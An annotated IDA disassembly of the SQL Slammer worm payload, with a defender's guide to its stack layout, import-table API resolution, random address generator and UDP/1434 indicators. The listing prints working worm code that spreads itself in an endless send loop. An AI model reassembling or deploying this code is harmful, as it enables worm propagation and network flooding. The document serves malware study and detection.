; By Zach James (zjames8@lsu.edu) [disasm in IDA --> .lst in vim]
; I tried to format it better to fit inside 80 or 100 char widths for printing
;
; Reviewer's reading guide (defender's view of this sample):
;   * This is the UDP worm payload named in the file name below. It executes on
;     the stack of the process that received it, rebuilds a copy of itself from
;     that live stack, and sends the copy in a tight loop to pseudo-random IPv4
;     addresses on UDP port 1434 (sockaddr_in assembled at 0000010B-0000011A).
;   * Every Win32 API is reached through hard-coded absolute addresses into the
;     import table of sqlsort.dll (42AE1018h, 42AE1010h, 42AE101Ch). That is why
;     the code only works against specific builds of that DLL: a different or
;     patched build makes the very first indirect call land somewhere else.
;   * Network indicators visible in this listing: destination UDP/1434, datagram
;     length 178h = 376 bytes, first bytes 04 01 01 01 ..., no delay between
;     sends (unconditional jmp at 00000176), no filtering of destination ranges.
;   * Stack frame once ebp is set at 00000094 (all slots are dwords, little-endian):
;       [ebp+3]   04h             first byte of the outgoing datagram (top byte of 04000000h)
;       [ebp]     04000000h
;       [ebp+4..] 24 x 01010101h, then 42B0C9DCh, then whatever was above on the stack
;                 (the author's "#"; presumably the rest of the received worm body)
;       [ebp-04h] 00000000h       NUL terminator of "kernel32.dll"
;       [ebp-08h] 6C6C642Eh       ".dll"
;       [ebp-0Ch] 32336C65h       "el32"
;       [ebp-10h] 6E72656Bh       "kern"   -> "kernel32.dll" starts here
;       [ebp-14h] 00000000h       NUL terminator of "GetTickCount"
;       [ebp-18h] 746E756Fh       "ount"
;       [ebp-1Ch] 436B6369h       "ickC"
;       [ebp-20h] 54746547h       "GetT"   -> "GetTickCount" starts here
;       [ebp-24h] 00006C6Ch       "ll\0\0"
;       [ebp-28h] 642E3233h       "32.d"
;       [ebp-2Ch] 5F327377h       "ws2_"   -> "ws2_32.dll" starts here
;       [ebp-30h] 00007465h       "et\0\0"
;       [ebp-34h] 6B636F73h       "sock"   -> "socket" starts here
;       [ebp-38h] 00006F74h       "to\0\0"
;       [ebp-3Ch] 646E6573h       "send"   -> "sendto" starts here
;       [ebp-40h] HMODULE of ws2_32.dll             (stored at 000000E4)
;       [ebp-44h] 00000000h  \ sockaddr_in.sin_zero  (stored at 0000010B / 0000010C)
;       [ebp-48h] 00000000h  /
;       [ebp-4Ch] PRNG state == sockaddr_in.sin_addr (seeded at 0000010D, stepped at 0000015A)
;       [ebp-50h] 9A050002h  sin_family=0002h (AF_INET), sin_port=059Ah = 1434 (network order)
;       [ebp-54h] UDP socket handle                 (stored at 0000012D)
;     All APIs called here are stdcall: each call pops its own arguments, so esp
;     returns to where it was and the ebp-relative offsets above stay valid.
;   * Notation kept from the original notes: S:[esp>a|b|c|...] is the stack read
;     from the top; "#" is whatever was on the stack before this code started.
;
seg000:00000000 ;
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ; | This file was generated by The Interactive Disassembler (IDA) |
seg000:00000000 ; | Copyright (c) 2022 Hex-Rays, |
seg000:00000000 ; | License info: 48-3051-7114-0E |
seg000:00000000 ; | LSU (Louisiana State University), Academic licenses |
seg000:00000000 ; +-------------------------------------------------------------------------+
seg000:00000000 ;
seg000:00000000 ; Input SHA256 : 61D0096867F96613237F4E76E0D73C67EA81A21F1F0C0DA735B65D1D5562B3D2
seg000:00000000 ; Input MD5 : AB4234A07E53EDB78299A938C4300FC2
seg000:00000000 ; Input CRC32 : 16D72AA9
seg000:00000000
seg000:00000000 ; File Name : C:\Users\golden\Desktop\sqlslammer-sample
seg000:00000000 ; Format : Binary file
seg000:00000000 ; Base Address: 0000h Range: 0000h - 01B2h Loaded length: 01B2h
seg000:00000000
seg000:00000000 .686p
seg000:00000000 .mmx
seg000:00000000 .model flat
seg000:00000000 ; ===========================================================================
seg000:00000000
seg000:00000000 ; Segment type: Pure code
seg000:00000000 seg000 segment byte public 'CODE' use32
seg000:00000000 assume cs:seg000
seg000:00000000 assume es:nothing, ss:nothing, ds:nothing, fs:nothing, gs:nothing
; ignore everything before this (deleted 00-74)
seg000:00000075 ; ---------------------------------------------------------------------------
; Eight-byte nop sled: control can land anywhere in 75h-7Ch and still reach 7Dh.
seg000:00000075     nop
seg000:00000076     nop
seg000:00000077     nop
seg000:00000078     nop
seg000:00000079     nop
seg000:0000007A     nop
seg000:0000007B     nop
seg000:0000007C     nop
;
; ---- Phase 1: build the frame (strings + the datagram image) on the stack ----
;
seg000:0000007D     push    42B0C9DCh       ; S:[esp>42B0C9DCh|#]. This dword ends up just after
                                            ; the 24 filler dwords inside the datagram that is
                                            ; re-sent at 00000174 (see frame table above).
seg000:00000082     mov     eax, 1010101h   ; filler dword; presumably chosen because it contains
                                            ; no zero byte. 24 copies = 96 bytes of 01h.
seg000:00000087     xor     ecx, ecx        ; ecx := 0
seg000:00000089     mov     cl, 18h         ; ecx := 18h = 24 (loop count; upper bits still 0)
seg000:0000008B
seg000:0000008B loc_8B:                     ; CODE XREF: seg000:0000008C↓j
seg000:0000008B     push    eax             ; S:[esp>1010101h|...|42B0C9DCh|#]
seg000:0000008C     loop    loc_8B          ; dec ecx; jump while ecx != 0 (32-bit mode uses ecx).
                                            ; Exit: 24 x 01010101h pushed, ecx == 0 (reused below
                                            ; as the NUL terminators).
seg000:0000008E     xor     eax, 5010101h   ; eax := 01010101h ^ 05010101h = 04000000h
                                            ; (two XORs instead of "mov eax, 4000000h" avoid the
                                            ; zero bytes that immediate would carry)
seg000:00000093     push    eax             ; S:[esp>4000000h|(1010101h)^24|42B0C9DCh|#]
seg000:00000094     mov     ebp, esp        ; frame base. [ebp] = 04000000h, so the byte at
                                            ; [ebp+3] is 04h -- the first byte of the datagram.
; Strings are pushed back-to-front so they read forwards in memory. Each one is
; terminated by a dword that is either all zero (ecx) or has zero upper bytes.
seg000:00000096     push    ecx             ; [ebp-04h] = 0        NUL for "kernel32.dll"
seg000:00000097     push    6C6C642Eh       ; [ebp-08h]            ".dll"
seg000:0000009C     push    32336C65h       ; [ebp-0Ch]            "el32"
seg000:000000A1     push    6E72656Bh       ; [ebp-10h]            "kern"  -> "kernel32.dll"
seg000:000000A6     push    ecx             ; [ebp-14h] = 0        NUL for "GetTickCount"
seg000:000000A7     push    746E756Fh       ; [ebp-18h]            "ount"
seg000:000000AC     push    436B6369h       ; [ebp-1Ch]            "ickC"
seg000:000000B1     push    54746547h       ; [ebp-20h]            "GetT"  -> "GetTickCount"
seg000:000000B6     mov     cx, 6C6Ch       ; ecx := 00006C6Ch. A 16-bit write leaves the upper
                                            ; half untouched; it is still 0 from the loop exit,
                                            ; which gives a free "\0\0" terminator.
seg000:000000BA     push    ecx             ; [ebp-24h]            "ll\0\0"
seg000:000000BB     push    642E3233h       ; [ebp-28h]            "32.d"
seg000:000000C0     push    5F327377h       ; [ebp-2Ch]            "ws2_"  -> "ws2_32.dll"
seg000:000000C5     mov     cx, 7465h       ; ecx := 00007465h
seg000:000000C9     push    ecx             ; [ebp-30h]            "et\0\0"
seg000:000000CA     push    6B636F73h       ; [ebp-34h]            "sock"  -> "socket"
seg000:000000CF     mov     cx, 6F74h       ; ecx := 00006F74h
seg000:000000D3     push    ecx             ; [ebp-38h]            "to\0\0"
seg000:000000D4     push    646E6573h       ; [ebp-3Ch]            "send"  -> "sendto"
;
; ---- Phase 2: resolve APIs through sqlsort.dll's import table ----
;
seg000:000000D9     mov     esi, 42AE1018h  ; absolute address of sqlsort.dll's import slot for
                                            ; LoadLibraryA (IDA view of that DLL quoted below):
                                            ;.idata:42AE1018 ; HMODULE (__stdcall *LoadLibraryA)(LPCSTR lpLibFileName)
                                            ;.idata:42AE1018 extrn LoadLibraryA:dword
                                            ;.idata:42AE1018 ; CODE XREF: sqlsort_8+17E↓p
                                            ;.idata:42AE1018 ; DATA XREF: sqlsort_8+17E↓r
                                            ; Hard-coding this ties the sample to one DLL layout.
seg000:000000DE     lea     eax, [ebp-2Ch]  ; eax := &"ws2_32.dll"  (2Ch = 44 = 11 dwords below ebp)
seg000:000000E1     push    eax             ; S:[esp>&"ws2_32.dll"|646E6573h|...]
seg000:000000E2     call    dword ptr [esi] ; eax := LoadLibraryA("ws2_32.dll"); stdcall pops the arg
                                            ; (5F327377h 642E3233h 00006C6Ch = "ws2_32.dll\0\0")
seg000:000000E4     push    eax             ; [ebp-40h] = HMODULE of ws2_32.dll (reused at 11Fh, 132h)
seg000:000000E5     lea     eax, [ebp-20h]  ; eax := &"GetTickCount"
seg000:000000E8     push    eax             ; pushed early: it is the 2nd (lpProcName) argument of
                                            ; the GetProcAddress call at 00000105
seg000:000000E9     lea     eax, [ebp-10h]  ; eax := &"kernel32.dll"
seg000:000000EC     push    eax             ; S:[esp>&"kernel32.dll"|&"GetTickCount"|HMODULE ws2_32|...]
seg000:000000ED     call    dword ptr [esi] ; eax := LoadLibraryA("kernel32.dll"); pops 1 arg
                                            ; (6E72656Bh 32336C65h 6C6C642Eh 0 = "kernel32.dll\0...")
seg000:000000EF     push    eax             ; S:[esp>HMODULE kernel32|&"GetTickCount"|HMODULE ws2_32|...]
                                            ; = GetProcAddress(hModule, lpProcName) argument order
seg000:000000F0     mov     esi, 42AE1010h  ; import slot expected to hold GetProcAddress:
                                            ;.idata:42AE1010 ; FARPROC (__stdcall *GetProcAddress)(HMODULE hModule, LPCSTR lpProcName)
                                            ;.idata:42AE1010 extrn GetProcAddress:dword
                                            ;.idata:42AE1010 ; CODE XREF: sqlsort_8+18C↓p
                                            ;.idata:42AE1010 ; DATA XREF: sqlsort_8+18C↓r
seg000:000000F5     mov     ebx, [esi]      ; ebx := function pointer stored in that slot.
                                            ; ebx is kept and reused at 0000013C.
seg000:000000F7     mov     eax, [ebx]      ; eax := first 4 bytes of that function's code
seg000:000000F9     cmp     eax, 51EC8B55h  ; bytes 55 8B EC 51 = push ebp / mov ebp,esp / push ecx,
                                            ; a common prologue. This is a fingerprint of the
                                            ; sqlsort.dll build: if the slot points at code with
                                            ; this prologue, use it; otherwise fall back to the
                                            ; other slot. Brittleness like this is why a single
                                            ; differing address neutralises the whole payload.
seg000:000000FE     jz      short loc_105
seg000:00000100     mov     esi, 42AE101Ch  ; alternate import slot for the other build. Note ebx
                                            ; is NOT reloaded here, so the PRNG constant derived
                                            ; at 0000013C always comes from slot 42AE1010h.
seg000:00000105
seg000:00000105 loc_105:                    ; CODE XREF: seg000:000000FE↑j
seg000:00000105     call    dword ptr [esi] ; eax := GetProcAddress(hKernel32, "GetTickCount");
                                            ; stdcall pops both args -> esp back to ebp-40h
seg000:00000107     call    eax             ; eax := GetTickCount() (ms since boot) -> PRNG seed
;
; ---- Phase 3: build sockaddr_in downward on the stack (16 bytes, [ebp-50h]..[ebp-41h]) ----
;
seg000:00000109     xor     ecx, ecx        ; ecx := 0
seg000:0000010B     push    ecx             ; [ebp-44h] = 0  sin_zero[4..7]
seg000:0000010C     push    ecx             ; [ebp-48h] = 0  sin_zero[0..3]
seg000:0000010D     push    eax             ; [ebp-4Ch] = tick count = sin_addr and PRNG state
                                            ; (the address field IS the random-number state)
seg000:0000010E     xor     ecx, 9B040103h  ; ecx := 9B040103h
seg000:00000114     xor     ecx, 1010101h   ; ecx := 9A050002h (split in two so neither immediate
                                            ; contains a zero byte)
seg000:0000011A     push    ecx             ; [ebp-50h] = 9A050002h -> bytes 02 00 05 9A:
                                            ; sin_family = 2 (AF_INET), sin_port = 059Ah = 1434
                                            ; in network byte order
;
; ---- Phase 4: resolve socket() and sendto() from ws2_32.dll ----
;
seg000:0000011B     lea     eax, [ebp-34h]  ; eax := &"socket"  (6B636F73h 00007465h = "socket\0\0")
seg000:0000011E     push    eax
seg000:0000011F     mov     eax, [ebp-40h]  ; eax := HMODULE of ws2_32.dll
seg000:00000122     push    eax             ; S:[esp>HMODULE ws2_32|&"socket"|9A050002h|tick|0|0|...]
seg000:00000123     call    dword ptr [esi] ; eax := GetProcAddress(hWs2_32, "socket"); pops 2 args
seg000:00000125     push    11h             ; protocol = 17 = IPPROTO_UDP
seg000:00000127     push    2               ; type     = 2  = SOCK_DGRAM
seg000:00000129     push    2               ; af       = 2  = AF_INET
seg000:0000012B     call    eax             ; eax := socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)
                                            ; (no error check: an INVALID_SOCKET result is used anyway)
seg000:0000012D     push    eax             ; [ebp-54h] = UDP socket handle
seg000:0000012E     lea     eax, [ebp-3Ch]  ; eax := &"sendto"  (646E6573h 00006F74h = "sendto\0\0")
seg000:00000131     push    eax
seg000:00000132     mov     eax, [ebp-40h]  ; eax := HMODULE of ws2_32.dll
seg000:00000135     push    eax             ; S:[esp>HMODULE ws2_32|&"sendto"|socket|9A050002h|...]
seg000:00000136     call    dword ptr [esi] ; eax := GetProcAddress(hWs2_32, "sendto"); pops 2 args
seg000:00000138     mov     esi, eax        ; esi := sendto (GetProcAddress is not needed again)
seg000:0000013A     or      ebx, ebx        ; only updates flags and nothing reads them here; no
                                            ; effect on the computation (filler or leftover)
seg000:0000013C     xor     ebx, 0FFD9613Ch ; ebx := [42AE1010h] ^ 0FFD9613Ch. Used below as the
                                            ; additive constant of the LCG; its value depends on the
                                            ; function pointer in that import slot, presumably tuned
                                            ; to yield a fixed constant on the targeted build.
;
; ---- Phase 5: infinite send loop. state := 214013*state + ebx; sendto(random addr) ----
;
seg000:00000142
seg000:00000142 loc_142:                    ; CODE XREF: seg000:00000176↓j
seg000:00000142     mov     eax, [ebp-4Ch]  ; eax := x (PRNG state, == sin_addr of the sockaddr_in)
; lea dst,[base+index*scale] computes an address without a memory access and
; without touching flags, so it doubles as cheap multiply-add:
seg000:00000145     lea     ecx, [eax+eax*2] ; ecx := 3x
seg000:00000148     lea     edx, [eax+ecx*4] ; edx := x + 12x = 13x
seg000:0000014B     shl     edx, 4          ; edx := 208x
seg000:0000014E     add     edx, eax        ; edx := 209x
seg000:00000150     shl     edx, 8          ; edx := 53504x
seg000:00000153     sub     edx, eax        ; edx := 53503x
seg000:00000155     lea     eax, [eax+edx*4] ; eax := x + 214012x = 214013x   (mod 2^32)
seg000:00000158     add     eax, ebx        ; eax := 214013x + ebx. 214013 is the multiplier of the
                                            ; MSVC C runtime rand() linear congruential generator.
seg000:0000015A     mov     [ebp-4Ch], eax  ; store new state -- this is also the destination IP of
                                            ; the next datagram. No range filtering at all, so
                                            ; reserved, multicast and unroutable addresses are hit too.
seg000:0000015D     push    10h             ; tolen = 16 = sizeof(sockaddr_in)
seg000:0000015F     lea     eax, [ebp-50h]  ; eax := &sockaddr_in  (50h = 80 = 20 dwords below ebp)
seg000:00000162     push    eax             ; to    = &sockaddr_in
seg000:00000163     xor     ecx, ecx        ; ecx := 0
seg000:00000165     push    ecx             ; flags = 0
seg000:00000166     xor     cx, 178h        ; ecx := 178h = 376 (upper half still 0)
seg000:0000016B     push    ecx             ; len   = 376 bytes
seg000:0000016C     lea     eax, [ebp+3]    ; buf := ebp+3: the 04h byte of 04000000h, then the
                                            ; 96 bytes of 01h, then 42B0C9DCh, then the bytes that
                                            ; were already above on the stack ("#"). The worm thus
                                            ; rebuilds its own datagram from the live stack rather
                                            ; than carrying a second copy.
seg000:0000016F     push    eax             ; buf
seg000:00000170     mov     eax, [ebp-54h]  ; eax := UDP socket handle
seg000:00000173     push    eax             ; s
                                            ; S:[esp>socket|&(ebp+3)|178h|0|&(ebp-50h)|10h|...]
seg000:00000174     call    esi             ; sendto(s, buf, 376, 0, &sockaddr_in, 16)
                                            ; Winsock: int sendto(SOCKET s, const char *buf, int len,
                                            ;   int flags, const struct sockaddr *to, int tolen);
                                            ; stdcall pops all 6 args -> esp back to ebp-54h.
                                            ; Return value is ignored.
seg000:00000176     jmp     short loc_142   ; unconditional: no sleep, no counter, no exit. The send
                                            ; rate is bounded only by the host's CPU and link, which
                                            ; is the bandwidth-saturation behaviour defenders observe.
; everything after this is junk